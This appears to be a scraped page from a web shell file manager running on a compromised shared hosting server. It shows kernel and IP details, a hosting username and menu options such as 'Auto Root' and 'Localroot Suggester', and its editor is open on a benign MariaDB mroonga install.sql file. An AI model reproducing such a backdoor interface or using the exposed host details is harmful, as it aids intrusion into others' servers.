Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
mariadb114 /
share /
mroonga /
Delete
Unzip
Name
Size
Permission
Date
Action
AUTHORS
182
B
-rw-r--r--
2024-05-26 18:15
COPYING
25.82
KB
-rw-r--r--
2024-05-26 18:15
install.sql
1.09
KB
-rw-r--r--
2024-05-26 18:19
uninstall.sql
391
B
-rw-r--r--
2024-05-26 18:15
Save
Rename
SET @inst=IF(EXISTS(SELECT * FROM mysql.plugin WHERE NAME='mroonga'),'DO 1', "INSTALL PLUGIN mroonga SONAME 'ha_mroonga'"); PREPARE s FROM @inst; EXECUTE s; DROP FUNCTION IF EXISTS last_insert_grn_id; CREATE FUNCTION last_insert_grn_id RETURNS INTEGER SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_snippet; CREATE FUNCTION mroonga_snippet RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_command; CREATE FUNCTION mroonga_command RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_escape; CREATE FUNCTION mroonga_escape RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_snippet_html; CREATE FUNCTION mroonga_snippet_html RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_normalize; CREATE FUNCTION mroonga_normalize RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_highlight_html; CREATE FUNCTION mroonga_highlight_html RETURNS STRING SONAME 'ha_mroonga.so'; DROP FUNCTION IF EXISTS mroonga_query_expand; CREATE FUNCTION mroonga_query_expand RETURNS STRING SONAME 'ha_mroonga.so';